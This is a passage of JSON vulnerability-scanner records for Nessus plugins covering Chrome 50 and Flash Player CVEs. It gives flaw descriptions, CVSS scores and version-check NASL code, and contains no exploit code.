CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. (CVE-2016-4116)", "cvss3": {"score": null, "vector": null}, "published": "2016-06-16T00:00:00", "type": "nessus", "title": "Google Chrome < 50.0.2661.102 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-1667", "CVE-2016-1668", "CVE-2016-1669", "CVE-2016-1670", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "9371.PASL", "href": "https://www.tenable.com/plugins/nnm/9371", "sourceData": "Binary data 9371.pasl", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:12:06", "description": "The version of Google Chrome installed on the remote Windows host is prior to 50.0.2661.102. It is, therefore, affected by multiple vulnerabilities :\n\n - A same-origin bypass vulnerability exists in DOM due to scripts being permitted run while a node is being adopted. A context-dependent attacker can exploit this to bypass the same-origin policy. (CVE-2016-1667)\n\n - A same-origin bypass vulnerability exists due to a flaw in the Blink V8 bindings. A context-dependent attacker can exploit this to bypass the same-origin policy.\n (CVE-2016-1668)\n\n - An overflow condition exists in V8 due to improper validation of user-supplied input. A context-dependent attacker can exploit this to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2016-1669)\n\n - A race condition exists in the loader related to the use of ids. An attacker can exploit this to have an unspecified impact. (CVE-2016-1670)\n\n - Multiple type confusion errors exist in the bundled version of Adobe Flash that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist in the bundled version of Adobe Flash that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists in the bundled version of Adobe Flash that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists in the bundled version of Adobe Flash that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist in the bundled version of Adobe Flash that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists in the bundled version of Adobe Flash when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. (CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-13T00:00:00", "type": "nessus", "title": "Google Chrome < 50.0.2661.102 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-1667", "CVE-2016-1668", "CVE-2016-1669", "CVE-2016-1670", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_50_0_2661_102.NASL", "href": "https://www.tenable.com/plugins/nessus/91128", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91128);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-1667\",\n \"CVE-2016-1668\",\n \"CVE-2016-1669\",\n \"CVE-2016-1670\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Google Chrome < 50.0.2661.102 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 50.0.2661.102. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A same-origin bypass vulnerability exists in DOM due to\n scripts being permitted run while a node is being\n adopted. A context-dependent attacker can exploit this\n to bypass the same-origin policy. (CVE-2016-1667)\n\n - A same-origin bypass vulnerability exists due to a flaw\n in the Blink V8 bindings. A context-dependent attacker\n can exploit this to bypass the same-origin policy.\n (CVE-2016-1668)\n\n - An overflow condition exists in V8 due to improper\n validation of user-supplied input. A context-dependent\n attacker can exploit this to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2016-1669)\n\n - A race condition exists in the loader related to the use\n of ids. An attacker can exploit this to have an\n unspecified impact. (CVE-2016-1670)\n\n - Multiple type confusion errors exist in the bundled\n version of Adobe Flash that allow an attacker to execute\n arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist in the bundled\n version of Adobe Flash that allow an attacker to execute\n arbitrary code. (CVE-2016-1097, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109,\n CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, \n CVE-2016-4121)\n\n - A heap buffer overflow condition exists in the bundled\n version of Adobe Flash that allows an attacker to\n execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists in the bundled\n version of Adobe Flash that allows an attacker to\n execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist in the bundled\n version of Adobe Flash that allow an attacker to execute\n arbitrary code. (CVE-2016-1096, CVE-2016-1098,\n CVE-2016-1099, CVE-2016-1100, CVE-2016-1102,\n CVE-2016-1104, CVE-2016-4109, CVE-2016-4111,\n CVE-2016-4112, CVE-2016-4113, CVE-2016-4114,\n CVE-2016-4115, CVE-2016-4120, CVE-2016-4160,\n CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists in the bundled version of Adobe Flash when\n loading dynamic-link libraries. An attacker can exploit\n this, via a specially crafted .dll file, to execute\n arbitrary code. (CVE-2016-4116)\");\n # http://googlechromereleases.blogspot.com/2016/05/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddef1fa8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 50.0.2661.102 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'50.0.2661.102', severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:11:12", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 50.0.2661.102. It is, therefore, affected by multiple vulnerabilities :\n\n - A same-origin bypass vulnerability exists in DOM due to scripts being permitted run while a node is being adopted. A context-dependent attacker can exploit this to bypass the same-origin policy. (CVE-2016-1667)\n\n - A same-origin bypass vulnerability exists due to a flaw in the Blink V8 bindings. A context-dependent attacker can exploit this to bypass the same-origin policy.\n (CVE-2016-1668)\n\n - An overflow condition exists in V8 due to improper validation of user-supplied input. A context-dependent attacker can exploit this to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2016-1669)\n\n - A race condition exists in the loader related to the use of ids. An attacker can exploit this to have an unspecified impact. (CVE-2016-1670)\n\n - Multiple type confusion errors exist in the bundled version of Adobe Flash that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist in the bundled version of Adobe Flash that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists in the bundled version of Adobe Flash that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists in the bundled version of Adobe Flash that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist in the bundled version of Adobe Flash that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists in the bundled version of Adobe Flash when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. (CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-13T00:00:00", "type": "nessus", "title": "Google Chrome < 50.0.2661.102 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-1667", "CVE-2016-1668", "CVE-2016-1669", "CVE-2016-1670", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_50_0_2661_102.NASL", "href": "https://www.tenable.com/plugins/nessus/91129", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91129);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-1667\",\n \"CVE-2016-1668\",\n \"CVE-2016-1669\",\n \"CVE-2016-1670\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Google Chrome < 50.0.2661.102 Multiple Vulnerabilities (Mac OS X)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Mac OS X host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 50.0.2661.102. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A same-origin bypass vulnerability exists in DOM due to\n scripts being permitted run while a node is being\n adopted. A context-dependent attacker can exploit this\n to bypass the same-origin policy. (CVE-2016-1667)\n\n - A same-origin bypass vulnerability exists due to a flaw\n in the Blink V8 bindings. A context-dependent attacker\n can exploit this to bypass the same-origin policy.\n (CVE-2016-1668)\n\n - An overflow condition exists in V8 due to improper\n validation of user-supplied input. A context-dependent\n attacker can exploit this to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2016-1669)\n\n - A race condition exists in the loader related to the use\n of ids. An attacker can exploit this to have an\n unspecified impact. (CVE-2016-1670)\n\n - Multiple type confusion errors exist in the bundled\n version of Adobe Flash that allow an attacker to execute\n arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist in the bundled\n version of Adobe Flash that allow an attacker to execute\n arbitrary code. (CVE-2016-1097, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109,\n CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, \n CVE-2016-4121)\n\n - A heap buffer overflow condition exists in the bundled\n version of Adobe Flash that allows an attacker to\n execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists in the bundled\n version of Adobe Flash that allows an attacker to\n execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist in the bundled\n version of Adobe Flash that allow an attacker to execute\n arbitrary code. (CVE-2016-1096, CVE-2016-1098,\n CVE-2016-1099, CVE-2016-1100, CVE-2016-1102,\n CVE-2016-1104, CVE-2016-4109, CVE-2016-4111,\n CVE-2016-4112, CVE-2016-4113, CVE-2016-4114,\n CVE-2016-4115, CVE-2016-4120, CVE-2016-4160,\n CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists in the bundled version of Adobe Flash when\n loading dynamic-link libraries. An attacker can exploit\n this, via a specially crafted .dll file, to execute\n arbitrary code. (CVE-2016-4116)\");\n # http://googlechromereleases.blogspot.com/2016/05/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddef1fa8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 50.0.2661.102 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'50.0.2661.102', severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:11:11", "description": "This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.621 (bsc#979422) :\n\n - APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102, CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous release, but got published afterwards :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-18T00:00:00", "type": "nessus", "title": "SUSE SLED12 Security Update : flash-player (SUSE-SU-2016:1305-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033", "CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:flash-player", "p-cpe:/a:novell:suse_linux:flash-player-gnome", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-1305-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91217", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1305-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91217);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\",\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SUSE SLED12 Security Update : flash-player (SUSE-SU-2016:1305-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.621 (bsc#979422) :\n\n - APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1101, CVE-2016-1102, CVE-2016-1103,\n CVE-2016-1104, CVE-2016-1105, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109,\n CVE-2016-1110, CVE-2016-4108, CVE-2016-4109,\n CVE-2016-4110, CVE-2016-4111, CVE-2016-4112,\n CVE-2016-4113, CVE-2016-4114, CVE-2016-4115,\n CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous\n release, but got published afterwards :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011,\n CVE-2016-1012, CVE-2016-1013, CVE-2016-1014,\n CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023,\n CVE-2016-1024, CVE-2016-1025, CVE-2016-1026,\n CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=979422\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1006/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1011/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1012/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1013/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1014/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1015/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1016/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1017/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1018/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1019/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1020/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1021/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1022/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1023/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1024/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1025/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1026/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1027/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1028/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1029/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1030/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1031/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1032/\");\n script_set_attribute(attribute:\"see_also\", 